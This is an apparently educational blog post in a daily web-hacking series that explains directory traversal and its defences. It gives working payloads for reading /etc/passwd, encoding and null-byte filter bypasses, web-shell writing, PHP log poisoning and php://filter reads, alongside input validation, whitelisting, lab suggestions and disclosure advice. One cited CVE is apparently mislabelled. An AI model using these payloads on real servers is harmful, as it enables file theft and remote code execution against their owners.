
Hey guys, Rocky here! 🚪🔓
Welcome to Day 9 of the Daily Web Hacking series! So far, we’ve tackled authentication bypasses, file upload vulns, and XSS. Today, we’re diving into Part 9: Directory Traversal—the hack that lets you “escape” a website’s restricted folders and rummage through the server’s entire file system. Imagine breaking out of a prison cell only to find the warden’s secret file cabinet. Let’s get into it!
—
What is Directory Traversal?
Directory Traversal (aka Path Traversal) is a vulnerability that allows attackers to read, write, or execute files outside the web root directory (the folder where the website’s public files live). By manipulating file paths (e.g., ../../
), hackers can:
- Steal sensitive files (
/etc/passwd
, .env
, backups).
- Access source code or configuration files.
- Plant malware or overwrite critical system files.
Why it’s dangerous:
—
How Directory Traversal Works
Web apps often use user-supplied input to load files (e.g., profile pictures, PDFs). If the app doesn’t sanitize input properly, attackers can inject path sequences like ../
to “escape” the web root.
Example:
A site loads user avatars via:
https://site.com/load?file=rocky.jpg
An attacker changes file=rocky.jpg
to:
file=../../../../etc/passwd
Result: The server returns the /etc/passwd
file, exposing system users!
—
Types of Directory Traversal
1. Basic Traversal
2. Encoded Traversal
- Bypass filters with URL encoding, double encoding, or Unicode.
- Payloads:
- URL-encoded:
..%2F..%2Fetc%2Fpasswd
- Double-encoded:
..%252F..%252Fetc%252Fpasswd
3. Null Byte Injection
4. Absolute Path Abuse
—
Real-World Directory Traversal Disasters
- Apache (2019):
CVE-2019-0211
allowed traversal via PHP scripts.
- WordPress (2017): Plugin flaw exposed
wp-config.php
files.
- Tesla (2018): Misconfigured servers leaked vehicle telemetry.
Lesson: Even tech giants mess up.
—
Step-by-Step Exploitation
Goal: Steal the /etc/passwd
file from a vulnerable photo-sharing site.
1. Find a Vulnerable Endpoint
Look for parameters like ?file=
, ?page=
, or ?load=
.
Example URL:
https://hacklivly.com/view?image=profile.jpg
2. Test Basic Traversal
3. Bypass Filters
If blocked, try encoding:
image=..%2F..%2Fetc%2Fpasswd
Or add a null byte:
image=../../etc/passwd%00.jpg
4. Escalate Access
- Steal config files:
.env
, config.php
, wp-config.php
.
- Execute code: If you can write files, upload a web shell.
—
Advanced Traversal Tactics
1. Writing Files
How: If the app lets you upload or modify files.
Payload:
../../var/www/html/shell.php
Impact: Execute commands via https://site.com/shell.php
.
2. Log Poisoning
Inject PHP into log files (e.g., access.log
), then traverse to them:
GET /<?php system($_GET['cmd']); ?>
Trigger execution:
https://site.com/view?file=../../var/log/apache2/access.log&cmd=id
3. PHP Wrappers
Use php://filter
to read encoded files:
file=php://filter/convert.base64-encode/resource=../../etc/passwd
Decode the Base64 output to get the file.
—
Tools for Directory Traversal
1. Burp Suite
- Repeater: Test payloads manually.
- Intruder: Brute-force common paths (
/etc/passwd
, .env
).
2. DotDotPwn
3. FFUF (Fuzz Faster U Fool)
—
Defending Against Directory Traversal
For Developers
Input Validation
Block ../
, ..\
, and absolute paths.
PHP Example:
$file = basename($_GET['file']); // Strips path info
Whitelist Allowed Files
Use a mapping of allowed filenames:
allowed_files = {"profile.jpg": "images/profile.jpg"}
file = allowed_files.get(request.args.get('file'), "default.jpg")
Use Platform-Safe Functions
Store Files Outside Web Root
For Admins
File Permissions
Web Application Firewall (WAF)
Log Monitoring
—
Practice Legally: Labs & Challenges
- DVWA (Damn Vulnerable Web App):
- Practice traversal in the File Inclusion module.
- PortSwigger Labs:
- Hack The Box:
- Machines like Traverxec focus on path traversal.
—
Ethical Hacking & Reporting
Never exploit traversal vulns without permission. If you find one:
- Document: Record steps to reproduce.
- Report: Use the site’s security contact or bug bounty program.
- Disclose: Wait for a fix before sharing publicly.
—
Final Thoughts
Directory traversal is the digital equivalent of picking a lock. It’s simple, silent, and shockingly effective. By validating inputs, hardening servers, and thinking like a hacker, you can slam the door on this attack.
Remember: The web’s security depends on you. Find flaws, fix them, and keep the internet safe—one ../
at a time.
Rocky out! ✌️
—
P.S. If you’re loving this series, share it with your crew! Let’s turn script kiddies into security guardians.
Discussion Question: What’s the wildest file you’ve accessed via traversal? I once found a database backup chilling in /var/backups
. 😅 Spill your stories below! 👇